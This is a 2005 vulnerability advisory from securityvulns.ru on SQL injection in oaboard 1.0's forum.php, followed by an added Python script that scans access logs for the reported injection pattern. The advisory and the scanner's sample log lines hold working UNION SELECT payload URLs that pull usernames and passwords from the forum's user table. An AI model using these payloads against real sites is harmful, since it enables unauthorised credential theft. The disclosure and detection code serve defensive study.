Computer Security
[EN] securityvulns.ru

From: abducter_minds_(at)_yahoo.com <abducter_minds_(at)_yahoo.com>
Date: 01.11.2005
Subject: SQL IN FORUM.PHP

Class:  Input Validation Error  
CVE:  CVE-MAP-NOMATCH  
Remote:  Yes  
Discovered BY ABDUCTER & Exploit BY DEVIL-00
             ABDUCTER_MINDS@S4A.CC (OR) ABDUCTER_MINDS@YAHOO.COM
Vulnerable: powered by oaboard 1.0
//////////////////////////////////
info:- FOR INFORMATION VISIT http://oaboard.myserver.at/oaboard/forum.php
/////////////////////////////////
discussion: THERE IS SQL IN FORUM.PHP
*********************************
EXPLOITS AND EXAMPLE
--------------------
//-------1---------//
http://WWW.VICTIM.COM/oaboard/forum.php?modul=topics&channel=[SQL]
http://WWW.VICTIM.COM/oaboard/forum.php?modul=topics&channel=-99%20UNION%20SELECT%20null,password%20FROM%20pw99_user%20WHERE%20id=1
//-------2--------//
http://WWW.VICTIM.COM/oaboard/forum.php?modul=posting&topic=[SQL]&channel=3
http://WWW.VICTIM.COM/oaboard/forum.php?modul=posting&topic=30%20UNION%20SELECT%20null,username,null,password%20FROM%20pw99_user%20WHERE%20id=1/*&channel=3
*********************************
CREDITS S4A.CC FOR ALL GEEKS
       FOR AL ARAB
       HACKER PAL
       MY LOVE (N0N0)
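
Added example, not part of the original advisory: a Python check that scans web-server access logs for the pattern reported above, flagging requests to forum.php whose channel or topic parameter is not a plain integer. The log lines are constructed samples in combined log format, and treating both parameters as non-negative integer IDs is an assumption drawn from the example URLs.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the advisory; assumed here to be non-negative integer IDs.
NUMERIC_PARAMS = {"channel", "topic"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"[0-9]+")

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Nov/2005:10:00:01 +0000] '
    '"GET /oaboard/forum.php?modul=topics&channel=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Nov/2005:10:00:05 +0000] '
    '"GET /oaboard/forum.php?modul=topics&channel=-99%20UNION%20SELECT%20null,'
    'password%20FROM%20pw99_user%20WHERE%20id=1 HTTP/1.1" 200 812',
    '192.0.2.10 - - [01/Nov/2005:10:00:09 +0000] '
    '"GET /oaboard/forum.php?modul=posting&topic=30&channel=3 HTTP/1.1" 200 4301',
    '198.51.100.7 - - [01/Nov/2005:10:00:12 +0000] '
    '"GET /oaboard/forum.php?modul=posting&topic=30%20UNION%20SELECT%20null,username,'
    'null,password%20FROM%20pw99_user%20WHERE%20id=1/*&channel=3 HTTP/1.1" 200 915',
]

def suspicious_params(target):
    """Return {param: decoded value} for non-integer channel/topic sent to forum.php."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/forum.php"):
        return {}
    hits = {}
    # parse_qsl percent-decodes values, so %20-encoded payloads are compared decoded.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in NUMERIC_PARAMS and not INT_RE.fullmatch(value):
            hits[name] = value
    return hits

def scan(log_lines):
    """Return [(line_number, {param: value})] for every flagged request line."""
    findings = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        hits = suspicious_params(match.group(1)) if match else {}
        if hits:
            findings.append((lineno, hits))
    return findings

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        print(lineno, hits)
```

The same integer-only rule, applied server-side before the value reaches the query, is what closes the hole; the log scan only shows whether it has already been probed.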

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


